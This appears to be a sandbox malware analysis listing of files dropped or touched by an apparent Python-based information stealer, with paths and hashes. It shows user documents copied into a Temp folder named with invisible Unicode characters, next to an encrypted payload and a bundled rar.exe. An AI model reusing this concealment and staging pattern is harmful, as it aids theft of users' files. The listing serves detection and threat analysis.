6218995dfcc8def99c8620c81908228f216353866221f9226e480764fb58941254a6fdc2045fd27e4aead1d2a5d699adc0afb0a833b241414d135bad79dc8e61

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\afyb4qvh.default-release\cache2\entries\491A6FA1CB41FD793B122773CE1CAB2F4188DA47

Filesize
61KB

MD5
c2621fc7559266f1da0462167ae1b01f

SHA1
72978b7d03f872a0b287ff9784b25c69f776eb8a

SHA256
c8d811c3f48ae7bb5de17bedd7ce23b4d9c8381a5a89d01b04645df2a136a234

SHA512
839728d395c4ca508ad9b297c0a4dfc75c473261c96e0b76ba5197f44c7248c2d1ab80cc24b7490f70c52537b596d8ddce3059f7b71765a85777ca7400db1b49

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\afyb4qvh.default-release\settings\main\ms-language-packs\browser\newtab\asrouter.ftl

Filesize
15KB

MD5
96c542dec016d9ec1ecc4dddfcbaac66

SHA1
6199f7648bb744efa58acf7b96fee85d938389e4

SHA256
7f32769d6bb4e875f58ceb9e2fbfdc9bd6b82397eca7a4c5230b0786e68f1798

SHA512
cda2f159c3565bc636e0523c893b293109de2717142871b1ec78f335c12bad96fc3f62bcf56a1a88abdeed2ac3f3e5e9a008b45e24d713e13c23103acc15e658

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESF2FB.tmp

Filesize
1KB

MD5
e9517256f8d438b9dbfda1ea4cd8a896

SHA1
6a45e4ff982bf3f9cef618439abf696530099786

SHA256
a8fca2580c8cded32dfb217b1c63458443452c159d90e2bcb83cc500454c8b0b

SHA512
cacc13c2ed506f06d90753fb79bff57f4563c9f0a7544fd1140fb968fd2d5572cf9d754833de44779ed1e973f32d9fd2fc345dbc2e19a2fe87b683b9a4f9c341

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI35362\VCRUNTIME140.dll

Filesize
106KB

MD5
49c96cecda5c6c660a107d378fdfc3d4

SHA1
00149b7a66723e3f0310f139489fe172f818ca8e

SHA256
69320f278d90efaaeb67e2a1b55e5b0543883125834c812c8d9c39676e0494fc

SHA512
e09e072f3095379b0c921d41d6e64f4f1cd78400594a2317cfb5e5dca03dedb5a8239ed89905c9e967d1acb376b0585a35addf6648422c7ddb472ce38b1ba60d

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI35362\_bz2.pyd

Filesize
48KB

MD5
c413931b63def8c71374d7826fbf3ab4

SHA1
8b93087be080734db3399dc415cc5c875de857e2

SHA256
17bfa656cabf7ef75741003497a1c315b10237805ff171d44625a04c16532293

SHA512
7dc45e7e5ed35cc182de11a1b08c066918920a6879ff8e37b6bfbdd7d40bffa39ea4aca778aa8afb99c81a365c51187db046bceb938ce9ace0596f1cf746474f

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI35362\_ctypes.pyd

Filesize
58KB

MD5
00f75daaa7f8a897f2a330e00fad78ac

SHA1
44aec43e5f8f1282989b14c4e3bd238c45d6e334

SHA256
9ffadcb2c40ae6b67ab611acc09e050bbe544672cf05e8402a7aa3936326de1f

SHA512
f222f0ebf16a5c6d16aa2fba933034e692e26e81fea4d8b008259aff4102fe8acf3807f3b016c24002daa15bb8778d7fef20f4ae1206d5a6e226f7336d4da5d4

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI35362\_decimal.pyd

Filesize
106KB

MD5
e3fb8bf23d857b1eb860923ccc47baa5

SHA1
46e9d5f746c047e1b2fefaaf8d3ec0f2c56c42f0

SHA256
7da13df1f416d3ffd32843c895948e460af4dc02cf05c521909555061ed108e3

SHA512
7b0a1fc00c14575b8f415fadc2078bebd157830887dc5b0c4414c8edfaf9fc4a65f58e5cceced11252ade4e627bf17979db397f4f0def9a908efb2eb68cd645c

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI35362\_hashlib.pyd

Filesize
35KB

MD5
b227bf5d9fec25e2b36d416ccd943ca3

SHA1
4fae06f24a1b61e6594747ec934cbf06e7ec3773

SHA256
d42c3550e58b9aa34d58f709dc65dc4ee6eea83b651740822e10b0aa051df1d7

SHA512
c6d7c5a966c229c4c7042ef60015e3333dab86f83c230c97b8b1042231fdb2a581285a5a08c33ad0864c6bd82f5a3298964ab317736af8a43e7caa7669298c3e

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI35362\_lzma.pyd

Filesize
85KB

MD5
542eab18252d569c8abef7c58d303547

SHA1
05eff580466553f4687ae43acba8db3757c08151

SHA256
d2a7111feeaacac8b3a71727482565c46141cc7a5a3d837d8349166bea5054c9

SHA512
b7897b82f1aa9d5aa895c3de810dab1aa335fdf7223e4ff29b32340ad350d9be6b145f95a71c7bc7c88c8df77c3f04853ae4d6f0d5a289721fc1468ecba3f958

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI35362\_queue.pyd

Filesize
25KB

MD5
347d6a8c2d48003301032546c140c145

SHA1
1a3eb60ad4f3da882a3fd1e4248662f21bd34193

SHA256
e71803913b57c49f4ce3416ec15dc8a9e5c14f8675209624e76cd71b0319b192

SHA512
b1fdb46b80bb4a39513685781d563a7d55377e43e071901930a13c3e852d0042a5302cd238ddf6ea4d35ceee5a613c96996bffad2da3862673a0d27e60ff2c06

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI35362\_socket.pyd

Filesize
43KB

MD5
1a34253aa7c77f9534561dc66ac5cf49

SHA1
fcd5e952f8038a16da6c3092183188d997e32fb9

SHA256
dc03d32f681634e682b02e9a60fdfce420db9f26754aefb9a58654a064dc0f9f

SHA512
ff9eeb4ede4b4dd75c67fab30d0dec462b8af9ca6adc1dcae58f0d169c55a98d85bb610b157f17077b8854ec15af4dfab2f0d47fa9bc463e5b2449979a50293a

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI35362\_sqlite3.pyd

Filesize
56KB

MD5
1a8fdc36f7138edcc84ee506c5ec9b92

SHA1
e5e2da357fe50a0927300e05c26a75267429db28

SHA256
8e4b9da9c95915e864c89856e2d7671cd888028578a623e761aeac2feca04882

SHA512
462a8f995afc4cf0e041515f0f68600dfd0b0b1402be7945d60e2157ffd4e476cf2ae9cdc8df9595f0fe876994182e3e43773785f79b20c6df08c8a8c47fffa0

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI35362\_ssl.pyd

Filesize
65KB

MD5
f9cc7385b4617df1ddf030f594f37323

SHA1
ebceec12e43bee669f586919a928a1fd93e23a97

SHA256
b093aa2e84a30790abeee82cf32a7c2209978d862451f1e0b0786c4d22833cb6

SHA512
3f362c8a7542212d455f1f187e24f63c6190e564ade0f24561e7e20375a1f15eb36bd8dce9fdaafdab1d6b348a1c6f7cddb9016e4f3535b49136550bc23454fb

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI35362\base_library.zip

Filesize
1.4MB

MD5
32ede00817b1d74ce945dcd1e8505ad0

SHA1
51b5390db339feeed89bffca925896aff49c63fb

SHA256
4a73d461851b484d213684f0aadf59d537cba6fe7e75497e609d54c9f2ba5d4a

SHA512
a0e070b2ee1347e85f37e9fd589bc8484f206fa9c8f4020de147b815d2041293551e3a14a09a6eb4050cfa1f74843525377e1a99bbdcfb867b61ebddb89f21f7

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI35362\blank.aes

Filesize
115KB

MD5
b3157f7654bba4c31cc91b6e9adc43cd

SHA1
ef822d9a4aac6dcb451d66a6841574df9af9310d

SHA256
c9102608332eda9340cf2e888507b46cea3141bfefae2813b165d665764bdfe8

SHA512
4d16847737b52d4451757a22e7e7d5a0f787d54473d8e9c611fc516c4d9f946057cec5d97d8c9dce8f0abb8c85dfafd9db403a25410b0c03704b50ced294163c

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI35362\libcrypto-3.dll

Filesize
1.6MB

MD5
78ebd9cb6709d939e4e0f2a6bbb80da9

SHA1
ea5d7307e781bc1fa0a2d098472e6ea639d87b73

SHA256
6a8c458e3d96f8dd3bf6d3cacc035e38edf7f127eee5563b51f8c8790ced0b3e

SHA512
b752769b3de4b78905b0326b5270091642ac89ff204e9e4d78670791a1fa211a54d777aeef59776c21f854c263add163adaef6a81b166190518cfaaf4e2e4122

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI35362\libffi-8.dll

Filesize
29KB

MD5
08b000c3d990bc018fcb91a1e175e06e

SHA1
bd0ce09bb3414d11c91316113c2becfff0862d0d

SHA256
135c772b42ba6353757a4d076ce03dbf792456143b42d25a62066da46144fece

SHA512
8820d297aeda5a5ebe1306e7664f7a95421751db60d71dc20da251bcdfdc73f3fd0b22546bd62e62d7aa44dfe702e4032fe78802fb16ee6c2583d65abc891cbf

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI35362\libssl-3.dll

Filesize
223KB

MD5
bf4a722ae2eae985bacc9d2117d90a6f

SHA1
3e29de32176d695d49c6b227ffd19b54abb521ef

SHA256
827fdb184fdcde9223d09274be780fe4fe8518c15c8fc217748ad5fd5ea0f147

SHA512
dd83b95967582152c7b5581121e6b69a07073e7a76fe87975742bb0fd7ecef7494ec940dba914364034cc4e3f623be98cc887677b65c208f14a2a9fc7497ca73

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI35362\python311.dll

Filesize
1.6MB

MD5
5f6fd64ec2d7d73ae49c34dd12cedb23

SHA1
c6e0385a868f3153a6e8879527749db52dce4125

SHA256
ff9f102264d1944fbfae2ba70e7a71435f51a3e8c677fd970b621c4c9ea71967

SHA512
c4be2d042c6e4d22e46eacfd550f61b8f55814bfe41d216a4df48382247df70bc63151068513855aa78f9b3d2f10ba6a824312948324c92de6dd0f6af414e8ab

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI35362\rar.exe

Filesize
615KB

MD5
9c223575ae5b9544bc3d69ac6364f75e

SHA1
8a1cb5ee02c742e937febc57609ac312247ba386

SHA256
90341ac8dcc9ec5f9efe89945a381eb701fe15c3196f594d9d9f0f67b4fc2213

SHA512
57663e2c07b56024aaae07515ee3a56b2f5068ebb2f2dc42be95d1224376c2458da21c965aab6ae54de780cb874c2fc9de83d9089abf4536de0f50faca582d09

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI35362\rarreg.key

Filesize
456B

MD5
4531984cad7dacf24c086830068c4abe

SHA1
fa7c8c46677af01a83cf652ef30ba39b2aae14c3

SHA256
58209c8ab4191e834ffe2ecd003fd7a830d3650f0fd1355a74eb8a47c61d4211

SHA512
00056f471945d838ef2ce56d51c32967879fe54fcbf93a237ed85a98e27c5c8d2a39bc815b41c15caace2071edd0239d775a31d1794dc4dba49e7ecff1555122

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI35362\select.pyd

Filesize
25KB

MD5
45d5a749e3cd3c2de26a855b582373f6

SHA1
90bb8ac4495f239c07ec2090b935628a320b31fc

SHA256
2d15c2f311528440aa29934920fb0b015eaf8cbe3b3c9ad08a282a2d6ba68876

SHA512
c7a641d475a26712652a84b8423155ca347e0ec0155bd257c200225a64752453e4763b8885d8fb043b30e92ae023a501fff04777ba5cfe54da9a68071f25fbea

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI35362\sqlite3.dll

Filesize
622KB

MD5
dbc64142944210671cca9d449dab62e6

SHA1
a2a2098b04b1205ba221244be43b88d90688334c

SHA256
6e6b6f7df961c119692f6c1810fbfb7d40219ea4e5b2a98c413424cf02dce16c

SHA512
3bff546482b87190bb2a499204ab691532aa6f4b4463ab5c462574fc3583f9fc023c1147d84d76663e47292c2ffc1ed1cb11bdb03190e13b6aa432a1cef85c4b

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI35362\unicodedata.pyd

Filesize
295KB

MD5
8c42fcc013a1820f82667188e77be22d

SHA1
fba7e4e0f86619aaf2868cedd72149e56a5a87d4

SHA256
0e00b0e896457ecdc6ef85a8989888ccfbf05ebd8d8a1c493946a2f224b880c2

SHA512
3a028443747d04d05fdd3982bb18c52d1afee2915a90275264bf5db201bd4612090914c7568f870f0af7dfee850c554b3fec9d387334d53d03da6426601942b4

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_5kgrxexa.s24.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\qnuj0ney\qnuj0ney.dll

Filesize
4KB

MD5
5af35165e015e9ad07cc7d8120fe164e

SHA1
74766eed14ff54d26e53b9cc4ba5c4873712f101

SHA256
8a5486c8b1d647a44dd1ebf4de97ac9810d9a999aa3e25f871e03ff87d13d1f0

SHA512
9756c17630519fba6f5710d50d17cba6efdbce82b355684eb630c809d9233850083a050bd5a2016fd38334693d4713e9ed11cbad90a456222e5ca4f23c614d00

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpaddon

Filesize
479KB

MD5
09372174e83dbbf696ee732fd2e875bb

SHA1
ba360186ba650a769f9303f48b7200fb5eaccee1

SHA256
c32efac42faf4b9878fb8917c5e71d89ff40de580c4f52f62e11c6cfab55167f

SHA512
b667086ed49579592d435df2b486fe30ba1b62ddd169f19e700cd079239747dd3e20058c285fa9c10a533e34f22b5198ed9b1f92ae560a3067f3e3feacc724f1

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpaddon-1

Filesize
13.8MB

MD5
0a8747a2ac9ac08ae9508f36c6d75692

SHA1
b287a96fd6cc12433adb42193dfe06111c38eaf0

SHA256
32d544baf2facc893057a1d97db33207e642f0dacf235d8500a0b5eff934ce03

SHA512
59521f8c61236641b3299ab460c58c8f5f26fa67e828de853c2cf372f9614d58b9f541aae325b1600ec4f3a47953caacb8122b0dfce7481acfec81045735947d

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‌‏ ‎ \Common Files\Desktop\ConnectUpdate.doc

Filesize
410KB

MD5
5920c8b5afc0beb4c61949aca27422db

SHA1
671acb289d7c62c593b03a605a2548f38bf90d68

SHA256
8bab182ece8ab61d588e65b686699614fdea478390849eec68b2d94aaf7549e5

SHA512
2bfc84d1ec9ea27ea5e3ff5db77f95a8e8f38aa51fe71276cb9f897e303a7ef484273ce3b26d3db25507f6b582e0a3dc9d459b81f4bc0a06cac14a4e712427d1

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‌‏ ‎ \Common Files\Desktop\ConvertMove.csv

Filesize
193KB

MD5
2278f5ac625fcdc242c6e5ab07208f9a

SHA1
974e3702958601a2b169ad507100dc2aa8f85327

SHA256
14468977b68a3932164f0eb0d9b3483c32e4e1180868e686e947d529c5f4a0e8

SHA512
8287fd3f965c1481fafc273d17fff69a5598f9c950bb3c3532c6f106f23610eec7b37fbb6e1a009569c57d51ee63b2cab2150ef82dcc679d8b28139f8511c4a3

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‌‏ ‎ \Common Files\Desktop\DenyCompress.mp4

Filesize
487KB

MD5
c63b1633e7af6878eecff8468916318b

SHA1
08ca472f9c74057b12271c35bb801289f91f9517

SHA256
ed36c6574209e18e4b6b715e6bd6fed07d240a44e61866c32a7b9ca7c354aaee

SHA512
74959e997844671eb0c54ca0c0949f533fe6c22f52630a81fa563c9e0671d8e3255e4de20423036e4313bd9d9b495058876c292005fc1d7e6685578b3cc5e8dc

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‌‏ ‎ \Common Files\Desktop\InvokeHide.txt

Filesize
503KB

MD5
7f0eb68fd50205ceb69fad8446d29fda

SHA1
d428658afc61da8380611069bb297689ba227c0a

SHA256
c440b486d02739befc2ba2b67767be9af2b448cd4dbdce511532f9af5f843d73

SHA512
5c095168023736733f3d21242963a8df5b7eca3b1fe0c9afa8ae97496763aa6d206a8c864fbc897aaa894521c6af2d1f9465ee560c5174cd1a96128f3b59c094

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‌‏ ‎ \Common Files\Desktop\JoinWait.xlsx

Filesize
14KB

MD5
cd7b274e24803e096693d64be7750bc4

SHA1
3535c0591fe075948cebcc21325af0705fcdd64a

SHA256
8de9e4019be186bc74618edc71380aff40f61aadc20336d923a5ba4a74b53155

SHA512
c37db3c9ccfde6eb8297b930c462cab36d5b85252eaa227a798512b9b1b61b993f8bb6ba3dc34cfd6d7855e180fd919ea85e5863b6e1b96751429e88def12c5f

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‌‏ ‎ \Common Files\Desktop\LockCompress.xlsx

Filesize
10KB

MD5
afc266da7a7c06647de37e1987ef8aec

SHA1
535a70fa9543094cec43b86a83bd627466ace563

SHA256
56062019a6a88330e49d87e6f522e8165e81fc38c5e086bf1ed51bc2916040a0

SHA512
fad984ceaf07da7eef95a77d62d197fd871fdb9b11c3fa40a24ebf354e33d3c9ed996a78fc13d1d24621fa27f8103cb51dfeb4f3590c65f6fe755afcf9f56a5a

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‌‏ ‎ \Common Files\Desktop\ProtectUnblock.docx

Filesize
18KB

MD5
de86e3185318ea92fac2f4e8c6a5d66d

SHA1
2e9f30c0911ec839ad1cca141eb215308540a5bd

SHA256
7aa2a35580b94f513330a9b780e0758f2a967726071ce855e5e9479783e22ce0

SHA512
5fe45f3efb2b5ea22fe9dbc12eaf4c96bbc6ffe86a2854331192260ead8f4370a8983755778eb700d9b437ed0fbb5b5d65d6e47ba07c345ed292011a9c883f21

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‌‏ ‎ \Common Files\Desktop\TestBackup.xlsx

Filesize
12KB

MD5
91e616457b6be1acaec1e4b58e32b42c

SHA1
bf40b2532eaf5b17faa6ff484de762a59f4702d5

SHA256
04fb1f947189f3f20ab3f9e968d3597a600c484903cb6907c5c29dd84f8c8510

SHA512
235192b5b99a6c4fd8408760a1441c5394b291520ce966594440bdecfd04c842597614273979b7efd4d1814ae9e477def050f1dfbb4edfc0a955c8fcfc459aff

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‌‏ ‎ \Common Files\Desktop\UpdateDismount.png

Filesize
379KB

MD5
d96aa6e61510bfc0f0fd25417f159c2d

SHA1
231bcc48451537eb65ac58a02820705bfde04c15

SHA256
dfc2b9e47a05d9a878423dc7928bc70854dd87a8fb079afe594a6b33a2c5941c

SHA512
2d59205601907a5df1f801cb432b8f4bd6f4e7fb0511fe4647878e773937d602b42e6e4a8d0a869028a084c2abac08b564984c47a4bfcdf43900c258c37f89bf

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‌‏ ‎ \Common Files\Desktop\WriteSuspend.xlsx

Filesize
12KB

MD5
9043e524ef6a71b7d439dd77a0376322

SHA1
ef17588b71555459ee9502cfe1bc82db2f01a138

SHA256
50b93adb2b3ea17d5ad26786fead9cbef0fa524e93e33d7cfb93aaca615233c7

SHA512
09706bffefaaa3b647e60607e0582abc995f3c5638e64072c42ae12bc3eb5b7d7d9c611441e7e9090ff1168c20ae99bfca04f892a0580fa769d4fa649d749668

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‌‏ ‎ \Common Files\Documents\DenyRemove.docx

Filesize
18KB

MD5
c6b794412271cc6a3e55e959a5af77f6

SHA1
2b91b05ff0345293a25dd05ba265e86353c8dac1

SHA256
3ea4ac2d8340284e2aac818c0bb83cb3d4da189d70b97749d2361a36f8e55ebf

SHA512
9a55513b54e502589d7ed798bc1c6679a72932a664f5f4ae0c276f23c5a3b9b78150755ba736cd8166db44cc48fbcd38a86fb86bfcd1de9d1320ffda2c7c743a

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‌‏ ‎ \Common Files\Documents\DenyUnpublish.xlsx

Filesize
12KB

MD5
8e831c80bc5945bc372fe6349e5fe185

SHA1
e7424e61b0c231a8b80099928a572679f9bbcd9b

SHA256
0c74e3ef47c3b833adf9be72b8d0ded48a967fd145fc79c23dbab6c58ce3442c

SHA512
3b74b8f0b2d0f5ae5058e0c5c70d0599eb5de0e75be71a366bbd51c69b8eb93d0a11ed68b32b3ebafdd4dae890275dcbb7ad6ff218211a8965667b6872e96cdc

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‌‏ ‎ \Common Files\Documents\LockConfirm.docx

Filesize
16KB

MD5
34ef9b0a17466910f774e316ddc1946f

SHA1
42adc0a2b0f602f0c0941cfcaf4b86509d60fe19

SHA256
c8ba3775ba7901b62cd07f3df5c81da3a50cd22b6c6f5592b664dd93f6f94205

SHA512
b3ea1e816ac6cdc0059fd64f6f3cc65ede3c77310fbda6bb7eb904d113ab170f2ee4d20698b706b9ce7fe5c830a0de0fded26c5552351a9d54fa37fb8fe1dc16

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\NG288NWKJ0IPA48RZ5T6.temp

Filesize
7KB

MD5
093da2a6053c093a1eee39abf93b2c0f

SHA1
0ff2095a42f4f6bfb915a2449998c2efffe4ac6a

SHA256
29474a3ff11edd6b70ce9271d9ec7ae775195cf765429f1f24c8946a777a2ff5

SHA512
a620501117d9679c308d581a162b1c4c31d036d3cd494ff9e4c1f98585480d71fe9a08a1a34404c7085ba6454438bcc42ee17adcc92941294679ee88ccf9ca43

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\afyb4qvh.default-release\AlternateServices.bin

Filesize
12KB

MD5
ef9e86a4639a4ddc1809d972efe869aa

SHA1
e55bca70305247c7f23ed505f630aa1250e88fd5

SHA256
b84439cede955fcfbd17c0586c3daa783021a695ed27767902eb4b5026495514

SHA512
c612369cb2039011d6340d8784c075dd385ef6e8bd88b5b61395b984932cb481dd645f6722c5dee118450601494fcdbe1517ea98d457cda8d62f3a7fd4c9f756

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\afyb4qvh.default-release\AlternateServices.bin

Filesize
6KB

MD5
b50b5af083b7381d043c65bc9c851436

SHA1
b236ace77509789c3c926efc3b1819e65e13cbce

SHA256
3a9bdd2b110bb21f10e8a1a49b613f622bd5ce48a0aca1b1cfad97e7242740a7

SHA512
caede8f450ac4a6555089f35a9b750a30c843d8158bd0614d23a8db9da4db1131aafa3f5607756a7301e655161f8f78434182ef97de1d4ab7dec2cd864b8b8bc

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\afyb4qvh.default-release\AlternateServices.bin

Filesize
8KB

MD5
51b02218f24599ea6657c738ce98bf47

SHA1
8a68644fcceeb1b0aa83a5199657be17a46f53e6

SHA256
52ea1e71c40fb7023e39b2663a16b584f22e1147cf16479f988772d803cc23a5

SHA512
0cc5d27351a39837da56b11b53eac9c69fa709f37cae33335dc8032f871f407e38d79ba956556247e08732bdac6bb0979c22046c8bd4979fd8cc446322c3462e

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\afyb4qvh.default-release\bookmarkbackups\bookmarks-2024-12-04_11_JfDMQVvtowmLlWl-GMbwGQ==.jsonlz4

Filesize
1016B

MD5
87607396ad29c472e1e9115f0e467684

SHA1
6d5a9e4682460591763620f1df0eefecc21131de

SHA256
db6ca8de01b8bd887954bb0a29f06d9454cfabcfe660b6f332015d314fd9c871

SHA512
d35f6d03da0cb2ad9f30a89c271590c740a239342475a145b16ad1f97159a7f2dd0c014c5d39459bfed508c527d4f05928445539e88eb97c509b90f9ef16789b

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\afyb4qvh.default-release\datareporting\glean\db\data.safe.tmp

Filesize
5KB

MD5
79a5a0738f6a99c56a93436c8c5fa70f

SHA1
c51a73a1ebeedc5438a4ad26b83ecdb8c152eaa1

SHA256
10962bbaec89182f60855330f67aa0c91d47138de4163d627053f86c3ab1ba1d

SHA512
33ec894269ab68ccb710578bb4752f705c3c6c42580f40925288e6113fea2770a24ea0f8dcd9886208b879b9c7195910e81e1aaced7e6e560619f7478f8b48cc

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\afyb4qvh.default-release\datareporting\glean\db\data.safe.tmp

Filesize
35KB

MD5
eee622513112b4e35eca40301f128466

SHA1
780a2e7596eaa456bc4f61950b9a0720d7f719b3

SHA256
85723140151bd1eb3e5e763a6fbb82deb317ae18f55f427146fe8ac2edc13507

SHA512
db265a018cf7ea5fda5b893a83ba2deda2b809a441685c6dab46ca02368ca5f987b39ffffe0792796ebec13e47c51c0b6bd5b5568f8750275582791dbae06894

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\afyb4qvh.default-release\datareporting\glean\db\data.safe.tmp

Filesize
6KB

MD5
3ca32b7a7ba1ede7fd92d78d042a206a

SHA1
27c05b61958424cd56b0cd6db3a5a1969fff35a6

SHA256
ce7e7171c1f7a84b5002e107e21e76fe066775e67794496de354515b6d9401ed

SHA512
2bd07c413f9435feb9989a4e4d08d67891e7eedc28d75bbaf73e68db6af3f3feb70d8293af8711c84be4ce1de22e28aad62b87232bedb9af03f4c03bbba7d4f8

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\afyb4qvh.default-release\datareporting\glean\db\data.safe.tmp

Filesize
35KB

MD5
47ebc021d838ce588e0826fef3e89bd9

SHA1
a214990c739fe1285fba3896dc06132173dd8e69

SHA256
4a1ca355bf887352be2764a711bf4eb5708f3776647df7fa2a89e964c0946e80

SHA512
1cee963110fa009c0960729f7e6d229a8981090e25621b9ce3fe2e17aee8f83313bfe6cf18233db80fec26f2caa9b2bd035f0ec8c7941659bf23dda89e047bdc

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\afyb4qvh.default-release\datareporting\glean\pending_pings\18f8a264-bb7b-4709-80e8-90e4facad8d4

Filesize
671B

MD5
f91af00e3f438358de21ae5bda936235

SHA1
22a6132361f973a5d554b10713e161491240c349

SHA256
38f0bf42582e3dd7a149ba7f8f932c474ba2efef97359fb5432b6efbc7226de9

SHA512
097e1ddc6926ec3d892db42f346fbac0bd11af9997be38da4298feb2c3e988628371388a06befc3d5a2ce8dc4d05130853abeaf9a366eca2c72ff54fce6c7ac3

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\afyb4qvh.default-release\datareporting\glean\pending_pings\d2252ea8-825c-4b39-8db2-b820e97a232c

Filesize
26KB

MD5
b280b171932ead939e703df79a2501bd

SHA1
bb5f299a120f3c88d7f19191d72e7b2b22c93aae

SHA256
8a1c6baed7cdbf5c4f9279736847fdeeee1b0cebe42cccc1e56d88336881727b

SHA512
4c3386a90d7f4a5f7f428cb3f552cc3277b7b4877a66cbee1fa7bab558bd4e69b02938e14eff2ba2193b7675d7249950f95b98a3f7cdf6543ca67c7ec407fda0

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\afyb4qvh.default-release\datareporting\glean\pending_pings\fc0c4594-53d6-4bcd-a9b1-b53064766c76

Filesize
982B

MD5
f8b904ebec7ab55c556c89d9497950b0

SHA1
e22eac2e502793450d14db65002f75e905ac3257

SHA256
7f9cd3c05044b63f58e1b37a43ab840add05883c4a17b328efe72e45d351254b

SHA512
1ec2faec9a8c1df72143f3a1c4e3c8fbd8bbcef422d578c057769209ae209ab0a6ffb2ab8a3f8ac45c46a73f2492b5c1ec5e5a1f5946b022a050cc349e79edf3

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\afyb4qvh.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.dll

Filesize
1.1MB

MD5
842039753bf41fa5e11b3a1383061a87

SHA1
3e8fe1d7b3ad866b06dca6c7ef1e3c50c406e153

SHA256
d88dd3bfc4a558bb943f3caa2e376da3942e48a7948763bf9a38f707c2cd0c1c

SHA512
d3320f7ac46327b7b974e74320c4d853e569061cb89ca849cd5d1706330aca629abeb4a16435c541900d839f46ff72dfde04128c450f3e1ee63c025470c19157

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\afyb4qvh.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.info

Filesize
116B

MD5
2a461e9eb87fd1955cea740a3444ee7a

SHA1
b10755914c713f5a4677494dbe8a686ed458c3c5

SHA256
4107f76ba1d9424555f4e8ea0acef69357dfff89dfa5f0ec72aa4f2d489b17bc

SHA512
34f73f7bf69d7674907f190f257516e3956f825e35a2f03d58201a5a630310b45df393f2b39669f9369d1ac990505a4b6849a0d34e8c136e1402143b6cedf2d3

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\afyb4qvh.default-release\gmp-widevinecdm\4.10.2710.0\manifest.json

Filesize
372B

MD5
bf957ad58b55f64219ab3f793e374316

SHA1
a11adc9d7f2c28e04d9b35e23b7616d0527118a1

SHA256
bbab6ca07edbed72a966835c7907b3e60c7aa3d48ddea847e5076bd05f4b1eda

SHA512
79c179b56e4893fb729b225818ab4b95a50b69666ac41d17aad0b37ab0ca8cd9f0848cbc3c5d9e69e4640a8b261d7ced592eae9bcb0e0b63c05a56e7c477f44e

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\afyb4qvh.default-release\gmp-widevinecdm\4.10.2710.0\widevinecdm.dll

Filesize
17.8MB

MD5
daf7ef3acccab478aaa7d6dc1c60f865

SHA1
f8246162b97ce4a945feced27b6ea114366ff2ad

SHA256
bc40c7821dcd3fea9923c6912ab1183a942c11b7690cfd79ed148ded0228777e

SHA512
5840a45cfdb12c005e117608b1e5d946e1b2e76443ed39ba940d7f56de4babeab09bee7e64b903eb82bb37624c0a0ef19e9b59fbe2ce2f0e0b1c7a6015a63f75

Download Submit
